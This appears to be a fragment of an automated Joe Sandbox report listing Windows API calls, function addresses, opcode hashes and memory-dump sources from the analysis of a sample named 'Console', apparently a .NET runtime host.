                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dac28a05fdd9bc205dbc9b7de12a66670d8fe84814229ee218639d74b7111f73
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33C18B71900605DFDB20DF68C844BAABBF1FF08314F14825EE855AB391DBB9AA45DBD0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetThreadErrorMode.KERNEL32(00008001,?), ref: 0106223C
                                                                                                                                                                                                                          • SetThreadErrorMode.KERNEL32(?,00000000,?,00000003,00000080), ref: 010622B5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorModeThread
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3782313741-0
                                                                                                                                                                                                                          • Opcode ID: 9f11ece7b7cc682df5eafb0e22a8902c6f8ab9efce64ed87717463baa99aa2f3
                                                                                                                                                                                                                          • Instruction ID: 775b29adf50d4fc58320554b725b5e032de35d855d8307c366715fc47c2cef05
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f11ece7b7cc682df5eafb0e22a8902c6f8ab9efce64ed87717463baa99aa2f3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE21B175900216EFD720CFACC909B6EBBF8FB08720F21425DE851B76D0D7B4A9048B91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetThreadErrorMode.KERNEL32(00008001,?,7CAB6A82,?,00000000), ref: 010979A9
                                                                                                                                                                                                                            • Part of subcall function 0122CD40: LoadLibraryExW.KERNEL32(?,00000000,?,?,?,00000000,?), ref: 0122CE91
                                                                                                                                                                                                                            • Part of subcall function 0122CD40: GetLastError.KERNEL32 ref: 0122CE9F
                                                                                                                                                                                                                            • Part of subcall function 0122CD40: SetLastError.KERNEL32(00000000), ref: 0122CFD4
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00000000), ref: 010979C5
                                                                                                                                                                                                                          • SetThreadErrorMode.KERNEL32(?,00000000,?,00000000), ref: 010979DF
                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00000000), ref: 010979E6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Error$Last$ModeThread$LibraryLoad
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3861856538-0
                                                                                                                                                                                                                          • Opcode ID: 4ac375f60ba0a99fbab90946f7642607b79a66629bf3121c80487f8bf83bf4ca
                                                                                                                                                                                                                          • Instruction ID: 1098a53feb0f2f1dca26c0012cbc6eacdb13c50a9860ad6547ced310dc3b323a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ac375f60ba0a99fbab90946f7642607b79a66629bf3121c80487f8bf83bf4ca
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F014076900109AFCB20DF58D909B9EBFB8EB04721F11426EE911A33E0D7755914CB91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WerRegisterRuntimeExceptionModule.KERNEL32(00000000,00FC0000,?,7CAB6A82,03C16310,00000000), ref: 011831B8
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • WATSON support: failed to register DAC dll with WerRegisterRuntimeExceptionModule, xrefs: 011832E4
                                                                                                                                                                                                                          • WATSON support: registered DAC dll with WerRegisterRuntimeExceptionModule, xrefs: 011832FD
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ExceptionModuleRegisterRuntime
                                                                                                                                                                                                                          • String ID: WATSON support: failed to register DAC dll with WerRegisterRuntimeExceptionModule$WATSON support: registered DAC dll with WerRegisterRuntimeExceptionModule
                                                                                                                                                                                                                          • API String ID: 634786029-3965477652
                                                                                                                                                                                                                          • Opcode ID: 99ed4eaef51f41a6d0af9d4bfdfb1d93d1b868c53f1ba279ce7a378389a15cc8
                                                                                                                                                                                                                          • Instruction ID: 2be921274a751e0022800be1de954b39435cf5f96232ff58dedf74084b18643a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 99ed4eaef51f41a6d0af9d4bfdfb1d93d1b868c53f1ba279ce7a378389a15cc8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9516970D04668DBEB20DF28CD497EEBBB0EB14714F0082D9D818AB381EB755A84CF51
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0107CB00: SleepEx.KERNEL32(0000000A,00000000,00000104,00000104,012CCD56), ref: 0107CB28
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32 ref: 010855D0
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,000002CC), ref: 010855EB
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32 ref: 01085643
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,0000000C), ref: 01085660
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$AllocProcess$Sleep
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 207374558-0
                                                                                                                                                                                                                          • Opcode ID: 42618c699c60bc0dd42b02dfdb956bfba162c0646820be570887efda1af0ef2e
                                                                                                                                                                                                                          • Instruction ID: 686cf2d441aea9a3da24698e0138106976621066198724915889d2843aa9f64e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 42618c699c60bc0dd42b02dfdb956bfba162c0646820be570887efda1af0ef2e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 520233B0A01B02EFE325CF28D95878AFBF4BB09314F10861ED5A9AB380D7B56514CF91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 01215CA0: GetProcessHeap.KERNEL32(?,012192BA,0000000C,7CAB6A82,?,00000002,?,?,014B3694,000000FF,?,0122426E,00000002,00000002), ref: 01215CAC
                                                                                                                                                                                                                            • Part of subcall function 01215CA0: RtlAllocateHeap.NTDLL(03BF0000,00000000,00000002,?,012192BA,0000000C,7CAB6A82,?,00000002,?,?,014B3694,000000FF,?,0122426E,00000002), ref: 01215CCA
                                                                                                                                                                                                                            • Part of subcall function 0107FC00: LeaveCriticalSection.KERNEL32(0163EEE4,7CAB6A82,03C16310), ref: 0107FC9F
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(0163EA20,?,?,?,?,?,?,?,?,00000000,?,?,C0000000,014B39CE), ref: 00FC2FAC
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(0163EA04,?,?,?,?,?,?,?,?,00000000,?,?,C0000000,014B39CE), ref: 00FC2FD5
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(0163EEB0,01647570,01647CF0,00000000), ref: 00FC3155
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(01647F34), ref: 00FC317E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$Initialize$Heap$AllocateLeaveProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3913766473-0
                                                                                                                                                                                                                          • Opcode ID: 52823be5e153028094ee876997fcedb6981da6d28893df3d74a696a1e62683f0
                                                                                                                                                                                                                          • Instruction ID: aa8df83017d43534a5f42687070ea935712e90aadef7918be92859003bb85b6d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 52823be5e153028094ee876997fcedb6981da6d28893df3d74a696a1e62683f0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94D18FB0D0138ADFEB61DFA8DE097997AF0BB11314F20869CC455AB3C1E7B54A04EB65
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00FCF770: wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,00000004,00000000,7CAB6A82,?,?), ref: 00FCF7FC
                                                                                                                                                                                                                            • Part of subcall function 00FCB100: HeapFree.KERNEL32(00000000,?,7CAB6A82,?,00000000,014B563D,000000FF,?,01216CAC,?,0159EE14), ref: 00FCB143
                                                                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,40000000,00000080,00000000,?,?,00000000,?,00000000,00000000,00000000,7CAB6A82,00000000,00000000,00000000), ref: 0122D19C
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,00000000,00000000,7CAB6A82,00000000,00000000,00000000), ref: 0122D1AA
                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 0122D2E0
                                                                                                                                                                                                                            • Part of subcall function 01223C50: HeapFree.KERNEL32(00000000,?,?,?), ref: 01223D68
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorFreeHeapLast$CreateFilewcscpy_s
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2733571464-0
                                                                                                                                                                                                                          • Opcode ID: 66d6816f94ecdc57374541263f3a8398466e45affae0ea40cc2e518957bee0e9
                                                                                                                                                                                                                          • Instruction ID: 73dcf69be692d8e940d3d63958f4e55cd0f250f0491342b4a6db027c6e648b0a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66d6816f94ecdc57374541263f3a8398466e45affae0ea40cc2e518957bee0e9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A511971801268EEDB20DFA4DD89BDDBBB4EB18314F2042D9E409A7291DB745F48CF51
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00FCF770: wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,00000004,00000000,7CAB6A82,?,?), ref: 00FCF7FC
                                                                                                                                                                                                                            • Part of subcall function 00FCB100: HeapFree.KERNEL32(00000000,?,7CAB6A82,?,00000000,014B563D,000000FF,?,01216CAC,?,0159EE14), ref: 00FCB143
                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,?,?,?,00000000,?), ref: 0122CE91
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0122CE9F
                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 0122CFD4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorLast$FreeHeapLibraryLoadwcscpy_s
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 479767642-0
                                                                                                                                                                                                                          • Opcode ID: 685ef63cc870da11f67166d73b771bd3ec31f4c74885ab3067c370160bedbb86
                                                                                                                                                                                                                          • Instruction ID: f97320c1641cd1aeab1ed2759d3e404fec75f9269ae0bc8d8faf8c41b8c190e3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 685ef63cc870da11f67166d73b771bd3ec31f4c74885ab3067c370160bedbb86
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F41097181526DAACB20DFA8DD89BDDBBB8EF18710F2041EAE409A3251DB745F44CF91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(7CAB6A82,93F80028,0CB3F4BC,00004000), ref: 0121AE8E
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: wcstoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,?), ref: 0121AEA2
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0121AEAE
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: HeapFree.KERNEL32(00000000,00000000), ref: 0121AED2
                                                                                                                                                                                                                          • GetActiveProcessorGroupCount.KERNEL32 ref: 012CE639
                                                                                                                                                                                                                            • Part of subcall function 01215D50: GetProcessHeap.KERNEL32(7CAB6A82,00000000,00000000,014B5000,000000FF,?,0122A0F5), ref: 01215D7E
                                                                                                                                                                                                                            • Part of subcall function 01215D50: RtlAllocateHeap.NTDLL(03BF0000,00000000,00000030,7CAB6A82,00000000,00000000,014B5000,000000FF,?,0122A0F5), ref: 01215D9A
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(0000000C,?,000000A1,?,?,?,014186CE,00FC0000,?,?,00000000), ref: 012CE670
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000), ref: 012CE695
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$_errno$ActiveAllocateCountFreeGroupProcessProcessorfreemallocwcstoul
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3982342263-0
                                                                                                                                                                                                                          • Opcode ID: ed62e6878e0188c393a1da69b9acc642f317c9778244e2ddb9c305c8eae1f541
                                                                                                                                                                                                                          • Instruction ID: f3466df8724c56db8b9bf906ed106b8144b5aa644f4d0278b54f6f2ed90858fd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ed62e6878e0188c393a1da69b9acc642f317c9778244e2ddb9c305c8eae1f541
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7931A6B46302424FEB28AFA4AC1A7363AD5BB10B48F05136CDB458B7D5EF7584148B91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(7CAB6A82,93F80028,0CB3F4BC,00004000), ref: 0121AE8E
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: wcstoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,?), ref: 0121AEA2
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0121AEAE
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: HeapFree.KERNEL32(00000000,00000000), ref: 0121AED2
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,00000000), ref: 01228256
                                                                                                                                                                                                                          • GetProcessAffinityMask.KERNEL32(00000000), ref: 0122825D
                                                                                                                                                                                                                          • QueryInformationJobObject.KERNEL32(00000000,0000000F,?,00000008,00000000), ref: 01228294
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Process_errno$AffinityCurrentFreeHeapInformationMaskObjectQuerywcstoul
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 286315805-0
                                                                                                                                                                                                                          • Opcode ID: 15fc368c1828b30389f95d1017f97fa22ad52b1352a176d7dc3217f9496eff0e
                                                                                                                                                                                                                          • Instruction ID: 55ec9e2bd5399a47ac8c6b499b6a5eb93135bf3265967d64a9cb992d5133cc5b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 15fc368c1828b30389f95d1017f97fa22ad52b1352a176d7dc3217f9496eff0e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70213B355246B2ABDB38CB5CCC44B7EB3E9EB42711F054629EA45D7289E730D844C7E2
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(7CAB6A82,93F80028,0CB3F4BC,00004000), ref: 0121AE8E
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: wcstoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,?), ref: 0121AEA2
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0121AEAE
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: HeapFree.KERNEL32(00000000,00000000), ref: 0121AED2
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,?,0141859A,?,00000000), ref: 0122E21D
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,00000028,?,?,?,0141859A,?,00000000), ref: 0122E23B
                                                                                                                                                                                                                          • CreateFileMappingA.KERNEL32(000000FF,00000000,04000040,00000000,000000FF,00000000), ref: 0122E2D5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$_errno$AllocCreateFileFreeMappingProcesswcstoul
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4279892807-0
                                                                                                                                                                                                                          • Opcode ID: cd93b2f2aa8406ec89fa7aa30f214d2d9854d004cc7e69a6fb877e17aee12e94
                                                                                                                                                                                                                          • Instruction ID: 5a87949bd8644cc2502843e5dbdbcb3c7a21feffc6e18bcd60126fbccab35f8a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd93b2f2aa8406ec89fa7aa30f214d2d9854d004cc7e69a6fb877e17aee12e94
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF21EF746607629FE731CF69EC047427BE4BB0A324F10875DE95A9BBD0EBB490848B80
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 01085D50: SetEvent.KERNEL32(03BFE848,?,7CAB6A82), ref: 0108600C
                                                                                                                                                                                                                          • SetEvent.KERNEL32(03C16160,00000001), ref: 010DAA1C
                                                                                                                                                                                                                          • SetEvent.KERNEL32(03C161E0,00000001), ref: 010DAA37
                                                                                                                                                                                                                          • SleepEx.KERNEL32(000000FF,00000000), ref: 010DAA5A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Event$Sleep
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1754279505-0
                                                                                                                                                                                                                          • Opcode ID: 1f8c549a89a14b0d41e65fb5b7ffee66ead1831da4f3da6879588702796f1690
                                                                                                                                                                                                                          • Instruction ID: b5549057aa9c3e4a1a693a941f250d4788d6910e40ca9b7112497243c170a787
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f8c549a89a14b0d41e65fb5b7ffee66ead1831da4f3da6879588702796f1690
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A118F31A00204DFDB64EFA8DD887897BF0EB05304F50A1A9D9858B2A5CB319896CF17
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,7CAB6A82,00000000,7CAB6A82,?,?,00000001,7CAB6A82,?), ref: 00FC5C5B
                                                                                                                                                                                                                            • Part of subcall function 00FFE830: EnterCriticalSection.KERNEL32(00000000,?,00000000,03C176F0,00000000,?,010E27AE,?,01229EF5), ref: 00FFE8B9
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,7CAB6A82,00000000,7CAB6A82,?,?,00000001,7CAB6A82,?), ref: 00FC5C8E
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,00000000,7CAB6A82,?,7CAB6A82,00000000,7CAB6A82,?,?,00000001,7CAB6A82,?), ref: 00FC5CDC
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2978645861-0
                                                                                                                                                                                                                          • Opcode ID: 927d74193ac6ba4ac6820a255278b0f019ab46e3de8496f84d1a0eed5dabb499
                                                                                                                                                                                                                          • Instruction ID: 6178bea25d4feb49b6fd47a16b136a3eeb0e39e5c95d2fdb549047bd1d284d17
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 927d74193ac6ba4ac6820a255278b0f019ab46e3de8496f84d1a0eed5dabb499
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D51EF71A05B0A9BCB21CF69C946F9AFBB4FF54B20F10425EE85563391D734AD40EB90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(03C71B78,?,00000000,7CAB6A82,00000000,00000129,00000000,01084E25,7CAB6A82,00000000), ref: 0122E98C
                                                                                                                                                                                                                            • Part of subcall function 014A8C50: GetSystemInfo.KERNEL32(?,00000000,03C71B78,03C05978), ref: 014A8C85
                                                                                                                                                                                                                            • Part of subcall function 014A8C50: GetSystemInfo.KERNEL32(?,00000000,03C71B78,03C05978), ref: 014A8CA6
                                                                                                                                                                                                                            • Part of subcall function 014A8C50: GetSystemInfo.KERNEL32(?,00000000,03C71B78,03C05978), ref: 014A8CCB
                                                                                                                                                                                                                            • Part of subcall function 014A8C50: GetSystemInfo.KERNEL32(?,00000000,03C71B78,03C05978), ref: 014A8CF3
                                                                                                                                                                                                                            • Part of subcall function 014A8C50: GetSystemInfo.KERNEL32(?,00000000,03C71B78,03C05978), ref: 014A8D19
                                                                                                                                                                                                                            • Part of subcall function 014A8C50: GetSystemInfo.KERNEL32(?,00000000,03C71B78,03C05978), ref: 014A8D39
                                                                                                                                                                                                                            • Part of subcall function 014A8C50: MapViewOfFile.KERNEL32(00000129,00000026,00000000,00000000,00000129,00000000,03C71B78,03C05978), ref: 014A8D57
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(03C71B78,7CAB6A82,00000000,?,00000000,00000000,?,00000000,7CAB6A82,00000000,00000129,00000000,01084E25,7CAB6A82,00000000), ref: 0122EA23
                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,7CAB6A82,00000000,00000129,00000000,01084E25,7CAB6A82,00000000,?,00000000,?,00000000), ref: 0122EA87
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InfoSystem$CriticalLeaveSection$AllocFileViewVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1604825630-0
                                                                                                                                                                                                                          • Opcode ID: 9c3d5ccd022c9982635804b8c6f91aa64f57c1073722e25381178ed8b37e3683
                                                                                                                                                                                                                          • Instruction ID: eb8f2db7730a5a859e68a1c110b3a0e437f3b035e17a5368e6ce6e4fa6946dbc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c3d5ccd022c9982635804b8c6f91aa64f57c1073722e25381178ed8b37e3683
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D341D075A10716EFEB25CF59D845BAEFBB0FB49720F01422AEA14A73A1C7315801DB90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • ResumeThread.KERNEL32(?,00000000,00000000,?,012CC863,00000001,00000000,012CC720,00000000,00000000), ref: 0108443A
                                                                                                                                                                                                                            • Part of subcall function 010E27C0: GetLastError.KERNEL32(7CAB6A82,?,00000000), ref: 010E27F2
                                                                                                                                                                                                                            • Part of subcall function 010E27C0: _swprintf.LIBCMT ref: 010E2829
                                                                                                                                                                                                                            • Part of subcall function 010E27C0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 010E2869
                                                                                                                                                                                                                            • Part of subcall function 010E27C0: MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,000000FF,00000000,00000000), ref: 010E28A4
                                                                                                                                                                                                                            • Part of subcall function 010E27C0: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 010E28EA
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
• Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$ErrorFreeHeapLastResumeThread_swprintf
                                                                                                                                                                                                                          • String ID: ResumeThread
                                                                                                                                                                                                                          • API String ID: 1738802777-947044025
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,015A58D0,00000000), ref: 012C3068
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                          Memory Dump Source
